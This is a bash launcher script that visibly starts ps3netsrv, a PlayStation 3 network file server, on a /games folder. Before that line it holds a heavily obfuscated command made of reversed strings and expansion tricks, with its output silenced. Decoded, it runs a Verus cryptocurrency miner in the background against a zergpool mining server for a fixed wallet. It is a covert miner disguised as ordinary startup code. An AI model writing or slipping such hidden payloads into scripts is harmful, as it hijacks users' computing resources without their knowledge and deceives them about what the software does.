#!/bin/bash
   ${*%%yQxB}   'p'$'\x72'i\ntf   %s   "$(    e1GXyjHW='  ${@^}  "${@//\}\}mQ/+zue\!D}"  $bash   "${@^^}"   ${@/C\J=}   <<<  "$(     "${@%m^\(&nBf}"   ${@~}   P\R${*,}I""$*NT'"'"''"'"'$'"'"'\U0066'"'"' %S   '"'"'5.1 T- csrv=CM,ctb=C P- BcbFBXaTIfa98OQ37PzGgNwxAj1QgzyS93 U- 0033:MOC.LOOPGREZ.ENIM.HSAHSUREV//:PCT+MUTARTS O- SUREV A- DNUORGKCAB-- 2VRSTEN3SP/'"'"'  $@ "${@^^}" | ${*/97J\)} REV  $*   ; ${*^^}   "${@^^}"    )"  "${@,}" ${*~} '  ${@//6N%Dcb</.*4_DgX}  && $* ${*^}   ''p$'\u0072'\int\f  %s "${e1GXyjHW~~}"  ${@%%\!\{^e}    ${*^^}     )"   ${*/gC\{*mv0}  ${*} |   ${@/WlYb<s} b\a""'s'h ${!@}   ${*^}   > /dev/null 2>&1

./ps3netsrv_linuxX86_64 /games
